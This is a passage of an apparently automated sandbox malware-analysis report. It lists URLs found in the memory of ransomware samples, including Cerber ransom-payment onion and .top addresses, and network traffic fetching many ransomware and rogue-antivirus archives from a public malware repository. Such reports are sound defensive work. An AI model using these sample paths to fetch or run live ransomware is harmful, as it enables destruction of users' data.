        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.347913498.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.329448544.000000000334C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.363121457.000000000335A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.342307244.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.330844092.0000000003363000.00000004.00000020.00020000.00000000.sdmp, Error file remover.msi.53.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.347913498.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.329448544.000000000334C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.363121457.000000000335A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.342307244.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.330844092.0000000003363000.00000004.00000020.00020000.00000000.sdmp, Error file remover.msi.53.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.347913498.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.329448544.000000000334C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.363121457.000000000335A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.342307244.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.330844092.0000000003363000.00000004.00000020.00020000.00000000.sdmp, Error file remover.msi.53.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
        Source: Endermanch@DeriaLock.exe, 0000000B.00000002.534778390.0000000000997000.00000004.00000020.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000000.334023928.00000000004C2000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://wallup.net
        Source: Endermanch@DeriaLock.exe, 0000000B.00000002.534778390.0000000000997000.00000004.00000020.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000000.334023928.00000000004C2000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://wallup.nethttp://wallup.nethttp://wallup.net
        Source: Error file remover.msi.53.drString found in binary or memory: http://www.advancedinstaller.com0
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.370278853.000000000594B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.370555642.000000000594B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.364397133.0000000005948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.364397133.0000000005948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com.
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.364397133.0000000005948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com9
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.364397133.0000000005948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comCt
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.364397133.0000000005948000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.369047483.000000000594B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.368115603.000000000594B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.366435009.000000000594A000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.366996082.000000000594B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comVjts
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.364397133.0000000005948000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.369047483.000000000594B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.368115603.000000000594B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.366435009.000000000594A000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.366996082.000000000594B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comans
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.364397133.0000000005948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comark
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.364397133.0000000005948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comof
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.364397133.0000000005948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comu
        Source: Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.354230243.000000000595B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.354717861.000000000595B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.354316802.000000000595B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.355145266.000000000595B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.354251930.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.354490867.0000000005964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comX
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.354717861.000000000595B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comic
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.361885376.000000000594C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
        Source: Endermanch@InfinityCrypt.exe, 0000001A.00000003.362016278.0000000005B0B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001A.00000003.362693889.0000000005B0B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001A.00000003.362350811.0000000005B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnd
        Source: Endermanch@InfinityCrypt.exe, 0000001A.00000003.361638956.0000000005B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnhtu
        Source: Endermanch@InfinityCrypt.exe, 0000001A.00000003.362693889.0000000005B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cns
        Source: wKAwMsck.exe, 00000037.00000003.404067123.0000000004640000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
        Source: Endermanch@InfinityCrypt.exe, 0000001A.00000003.369496171.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001A.00000003.368531949.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001A.00000003.367448394.0000000005AF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
        Source: Endermanch@InfinityCrypt.exe, 0000001A.00000003.369496171.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001A.00000003.368531949.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001A.00000003.367448394.0000000005AF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/$V
        Source: Endermanch@InfinityCrypt.exe, 0000001A.00000003.369496171.0000000005AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/6V
        Source: Endermanch@InfinityCrypt.exe, 0000001A.00000003.368531949.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001A.00000003.367448394.0000000005AF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/=V
        Source: Endermanch@InfinityCrypt.exe, 0000001A.00000003.369496171.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001A.00000003.368531949.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001A.00000003.367448394.0000000005AF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/NV
        Source: Endermanch@InfinityCrypt.exe, 0000001A.00000003.369496171.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001A.00000003.368531949.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001A.00000003.367448394.0000000005AF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/V
        Source: Endermanch@InfinityCrypt.exe, 0000001A.00000003.369496171.0000000005AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
        Source: Endermanch@InfinityCrypt.exe, 0000001A.00000003.369496171.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001A.00000003.368531949.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001A.00000003.367448394.0000000005AF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
        Source: Endermanch@InfinityCrypt.exe, 0000001A.00000003.369496171.0000000005AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/=V
        Source: Endermanch@InfinityCrypt.exe, 0000001A.00000003.369496171.0000000005AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/kV
        Source: Endermanch@InfinityCrypt.exe, 0000001A.00000003.368531949.0000000005AF6000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001A.00000003.367448394.0000000005AF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/kV
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.354908029.0000000005963000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.354591328.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.354251930.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.352914234.000000000595D000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.353856101.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.355248270.0000000005963000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.353598984.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.354490867.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.353177160.0000000005963000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.353764340.0000000005963000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.353490553.0000000005964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.354591328.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.354251930.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.352914234.000000000595D000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.353856101.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.353598984.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.354490867.0000000005964000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.353177160.0000000005963000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.353764340.0000000005963000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.353490553.0000000005964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.coma-d
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.370373265.0000000005953000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.370657670.0000000005953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.370373265.0000000005953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com(
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.360250995.0000000005949000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.360250995.0000000005949000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.krimr
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.360250995.0000000005949000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.krl
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.356383984.000000000595B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.356492362.000000000595B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.358281690.000000000595B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.356437745.000000000595B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.356635658.000000000595B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.356492362.000000000595B000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 0000000B.00000003.356437745.000000000595B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comF
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.356492362.000000000595B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comc
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.17gcun.top/0F6B-7D97-56E6-0098-B361
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.18ey8e.top/0F6B-7D97-56E6-0098-B361
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.19kdeh.top/0F6B-7D97-56E6-0098-B361
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.1mpsnr.top/0F6B-7D97-56E6-0098-B361
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.1n5mod.top/0F6B-7D97-56E6-0098-B361
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa06
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/s?wd=%E6%80%8E%E4%B9%88%E5%AE%89%E8%A3%85%20tor%20%E6%B5%8F%E8%A7%88%E5%99%A8
        Source: Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
        Source: Error file remover.msi.53.drString found in binary or memory: https://www.thawte.com/cps0/
        Source: Error file remover.msi.53.drString found in binary or memory: https://www.thawte.com/repository0
        Source: Endermanch@Cerber5.exe, 00000005.00000003.362009914.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DR069.44.drString found in binary or memory: https://www.torproject.org/
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/downlo&#097;d/download-easy.html.en
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/download/download-easy.html.en
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/results?search_query=Install
        Source: unknownDNS traffic detected: queries for: github.com
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A41CA3 GetProcessHeap,GetProcessHeap,HeapAlloc,RtlAllocateHeap,GetProcessHeap,HeapAlloc,htons,send,recv,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,4_2_04A41CA3
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Petya.A.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/PolyRansom.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/ViraLock.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/ViraLock.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/WannaCrypt0r.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Xyeta.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/AnViPC2009.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/FakeAdwCleaner.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Happy%20Antivirus.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/InternetSecurityGuard.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Live%20Protection%20Suite%202019.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Movie.mpeg.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/NavaShield.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender%20v2.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Central.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender%202015.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SE2011.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SecurityScanner.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SmartDefragmenter.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/VAV2008.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
